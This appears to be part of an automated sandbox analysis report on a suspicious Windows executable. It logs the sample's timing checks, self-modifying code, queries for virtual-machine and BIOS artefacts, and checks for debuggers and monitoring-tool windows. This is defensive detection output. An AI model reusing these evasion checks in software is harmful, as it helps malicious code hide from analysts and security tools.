Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52603A1 second address: 52603A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52603A7 second address: 52603AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52603AD second address: 52603B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52603B1 second address: 52603B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52603B5 second address: 52603FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F60A56E2295h 0x0000000e pushad 0x0000000f mov bl, cl 0x00000011 movsx edi, ax 0x00000014 popad 0x00000015 js 00007F6034D24221h 0x0000001b jmp 00007F6034D241D2h 0x00000020 cmp dword ptr [ebp-14h], edi 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F6034D241D7h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52603FE second address: 52604C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561AE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F60A5F1FB56h 0x0000000f pushad 0x00000010 movzx esi, di 0x00000013 mov ebx, 253CCEACh 0x00000018 popad 0x00000019 mov ebx, dword ptr [ebp+08h] 0x0000001c jmp 00007F6035561ADBh 0x00000021 lea eax, dword ptr [ebp-2Ch] 0x00000024 jmp 00007F6035561AE6h 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F6035561ADEh 0x00000031 sub cx, AB28h 0x00000036 jmp 00007F6035561ADBh 0x0000003b popfd 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F6035561AE0h 0x00000046 or eax, 5D8ADD88h 0x0000004c jmp 00007F6035561ADBh 0x00000051 popfd 0x00000052 jmp 00007F6035561AE8h 0x00000057 popad 0x00000058 mov ecx, 28E19601h 0x0000005d popad 0x0000005e xchg eax, esi 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 push edi 0x00000063 pop eax 0x00000064 push ebx 0x00000065 pop esi 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52604C3 second address: 52604D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6034D241CDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52604D4 second address: 52604D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52604D8 second address: 52604FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6034D241D9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52604FC second address: 5260542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561AE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F6035561ADEh 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 mov edi, ecx 0x00000015 jmp 00007F6035561ADAh 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F6035561ADEh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260542 second address: 5260548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52605CB second address: 5250E1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov ax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F60A5F1FB54h 0x00000012 xor eax, eax 0x00000014 jmp 00007F603553B20Ah 0x00000019 pop esi 0x0000001a pop edi 0x0000001b pop ebx 0x0000001c leave 0x0000001d retn 0004h 0x00000020 nop 0x00000021 xor ebx, ebx 0x00000023 cmp eax, 00000000h 0x00000026 je 00007F6035561C33h 0x0000002c call 00007F603A74FD6Dh 0x00000031 mov edi, edi 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F6035561ADAh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5250E1E second address: 5250EB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6034D241D1h 0x00000009 or eax, 42DD25B6h 0x0000000f jmp 00007F6034D241D1h 0x00000014 popfd 0x00000015 mov di, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F6034D241CAh 0x00000021 push eax 0x00000022 jmp 00007F6034D241CBh 0x00000027 xchg eax, ebp 0x00000028 jmp 00007F6034D241D6h 0x0000002d mov ebp, esp 0x0000002f jmp 00007F6034D241D0h 0x00000034 xchg eax, ecx 0x00000035 jmp 00007F6034D241D0h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F6034D241CEh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5250EB3 second address: 5250EB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5250EB8 second address: 5250EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F6034D241D4h 0x00000013 xor ch, 00000028h 0x00000016 jmp 00007F6034D241CBh 0x0000001b popfd 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5250EEC second address: 5250EF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260961 second address: 526096A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, F57Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 526096A second address: 52609AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F6035561AE3h 0x00000011 and ecx, 53918DCEh 0x00000017 jmp 00007F6035561AE9h 0x0000001c popfd 0x0000001d mov bx, cx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52609AD second address: 52609B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52609B3 second address: 52609DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561ADFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edx, si 0x00000012 call 00007F6035561ADCh 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52609DD second address: 5260A27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov eax, 427D016Dh 0x00000011 pushad 0x00000012 mov ah, 8Ah 0x00000014 call 00007F6034D241D5h 0x00000019 pop esi 0x0000001a popad 0x0000001b popad 0x0000001c cmp dword ptr [75C7459Ch], 05h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F6034D241CAh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260A27 second address: 5260A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260A2D second address: 5260A41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F60A56D2190h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260A41 second address: 5260A53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561ADEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260A53 second address: 5260A89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov cl, bl 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F6034D241CDh 0x00000015 and esi, 026510E6h 0x0000001b jmp 00007F6034D241D1h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260BFA second address: 5260C39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b mov bx, B1E8h 0x0000000f mov ah, bl 0x00000011 popad 0x00000012 call 00007F60A5F16A3Ch 0x00000017 push 75C12B70h 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov eax, dword ptr [esp+10h] 0x00000027 mov dword ptr [esp+10h], ebp 0x0000002b lea ebp, dword ptr [esp+10h] 0x0000002f sub esp, eax 0x00000031 push ebx 0x00000032 push esi 0x00000033 push edi 0x00000034 mov eax, dword ptr [75C74538h] 0x00000039 xor dword ptr [ebp-04h], eax 0x0000003c xor eax, ebp 0x0000003e push eax 0x0000003f mov dword ptr [ebp-18h], esp 0x00000042 push dword ptr [ebp-08h] 0x00000045 mov eax, dword ptr [ebp-04h] 0x00000048 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000004f mov dword ptr [ebp-08h], eax 0x00000052 lea eax, dword ptr [ebp-10h] 0x00000055 mov dword ptr fs:[00000000h], eax 0x0000005b ret 0x0000005c jmp 00007F6035561AE8h 0x00000061 sub esi, esi 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F6035561ADCh 0x0000006a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260CAA second address: 5260CAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260CAE second address: 5260CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260CB4 second address: 5260CE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F60A56C7E85h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6034D241D7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260CE5 second address: 5260CEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260CEB second address: 5260CEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52709EF second address: 52709F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52709F5 second address: 52709F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52709F9 second address: 5270AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561ADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edi, 4DAF953Ah 0x00000012 mov bx, CB06h 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 call 00007F6035561AE3h 0x0000001e mov esi, 7E656DAFh 0x00000023 pop esi 0x00000024 mov ecx, edx 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F6035561AE3h 0x00000031 and ax, EEEEh 0x00000036 jmp 00007F6035561AE9h 0x0000003b popfd 0x0000003c call 00007F6035561AE0h 0x00000041 pop eax 0x00000042 popad 0x00000043 popad 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 pushfd 0x00000049 jmp 00007F6035561AE9h 0x0000004e jmp 00007F6035561ADBh 0x00000053 popfd 0x00000054 pushfd 0x00000055 jmp 00007F6035561AE8h 0x0000005a sbb cx, DB28h 0x0000005f jmp 00007F6035561ADBh 0x00000064 popfd 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270AD3 second address: 5270AFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6034D241CCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270AFF second address: 5270B3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561ADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F6035561AE6h 0x0000000f mov esi, dword ptr [ebp+0Ch] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007F6035561ADDh 0x0000001a pop esi 0x0000001b movsx edi, ax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270B3D second address: 5270B97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F6034D241D6h 0x00000010 je 00007F60A56C1A11h 0x00000016 jmp 00007F6034D241D0h 0x0000001b cmp dword ptr [75C7459Ch], 05h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6034D241CAh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270B97 second address: 5270B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270B9B second address: 5270BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270BA1 second address: 5270BE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6035561ADCh 0x00000009 sbb ecx, 60FB5968h 0x0000000f jmp 00007F6035561ADBh 0x00000014 popfd 0x00000015 mov ch, 13h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007F60A5F173A5h 0x00000020 pushad 0x00000021 jmp 00007F6035561AE1h 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270BE4 second address: 5270C1E instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 pushad 0x00000009 mov si, 07D1h 0x0000000d push ecx 0x0000000e pushfd 0x0000000f jmp 00007F6034D241CDh 0x00000014 adc ah, FFFFFFE6h 0x00000017 jmp 00007F6034D241D1h 0x0000001c popfd 0x0000001d pop ecx 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270C1E second address: 5270C31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561ADFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270CCF second address: 5270CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270CD3 second address: 5270CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270CD9 second address: 5270CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270CDF second address: 5270CEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270CEE second address: 5270CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270CF2 second address: 5270CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270CF6 second address: 5270CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270CFC second address: 5270D0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6035561ADDh 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Special instruction interceptor: First address: 87BE7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Special instruction interceptor: First address: 87B01 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Special instruction interceptor: First address: 2AC5AA instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe

Code function: 0_3_014C4D45 str word ptr [edx+61642E2Ah]

0_3_014C4D45

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe TID: 7136	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe TID: 7128	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe TID: 1720	Thread sleep time: -180000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe

Last function: Thread delayed

Source: NAnOVCOt4L.exe, 00000000.00000002.2376760150.0000000000201000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: NAnOVCOt4L.exe, NAnOVCOt4L.exe, 00000000.00000003.1746946437.00000000014BD000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1832109571.00000000014BD000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2377918643.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1854093448.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2377781687.0000000001489000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.2019875119.00000000014BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: NAnOVCOt4L.exe, 00000000.00000002.2376760150.0000000000201000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: NTICE
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: SICE
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Process queried: DebugPort	Jump to behavior
